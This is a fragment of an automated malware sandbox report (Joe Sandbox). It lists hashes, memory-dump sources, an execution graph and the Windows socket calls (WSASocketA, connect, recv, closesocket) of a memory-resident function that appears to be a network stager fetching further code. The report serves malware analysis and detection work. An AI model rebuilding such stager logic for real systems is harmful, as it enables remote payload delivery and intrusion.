                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                              • String ID:
                                                              • API String ID: 4254243056-0
                                                              • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                                              • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

                                                              Execution Graph

                                                              Execution Coverage:42.8%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:10
                                                              Total number of Limit Nodes:3
                                                              execution_graph 34 580000 37 580095 34->37 36 580006 36->36 38 5800aa 37->38 39 5800bc WSASocketA 38->39 40 5800d8 connect 39->40 41 5800f1 recv 40->41 43 5800e7 40->43 42 580139 closesocket 41->42 41->43 42->39 42->43 43->40 43->41 43->42 44 580157 43->44 44->36

                                                              Callgraph

                                                              • Executed
                                                              • Not Executed
                                                              • Opacity -> Relevance
                                                              • Disassembly available
                                                              callgraph 0 Function_00580000 1 Function_00580095 0->1

                                                              Executed Functions

                                                              Function 00580095 Relevance: 6.1, APIs: 4, Instructions: 81networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 580095-5800ba 3 5800bc-5800d7 WSASocketA 0->3 4 5800d8-5800e5 connect 3->4 5 5800f1-580101 recv 4->5 6 5800e7-5800ea 4->6 8 580139-580146 closesocket 5->8 9 580103-580117 5->9 6->4 7 5800ec call 580158 6->7 7->5 8->3 10 58014c 8->10 13 580118-580127 9->13 10->7 15 580129-580132 13->15 16 580151-580155 13->16 15->8 16->13 17 580157 16->17
                                                              APIs
                                                              • WSASocketA.WS2_32(E0DF0FEA,00000002,00000001,00000000,00000000,00000000,00000000,61040002,17DDB993,0000000A,?,?,5F327377,00003233), ref: 005800D5
                                                              • connect.WS2_32(6174A599,?,?,00000010,?,?,5F327377,00003233), ref: 005800E1
                                                              • recv.WS2_32(5FC8D902,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 005800FC
                                                              • closesocket.WS2_32(614D6E75,?,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 0058013F
                                                              Memory Dump Source
                                                              • Source File: 00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_53_2_580000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Socketclosesocketconnectrecv
                                                              • String ID:
                                                              • API String ID: 2083937939-0
                                                              • Opcode ID: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction ID: bfe1b6e906da5a7b4e982e2a360097eda895f4a0793274a32a426a5b5615d92e
                                                              • Opcode Fuzzy Hash: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction Fuzzy Hash: 8D11ADB06802987EF57032629C4BFBB6D1CEF42BA4F101424BF45FA0C1C9829C4882FA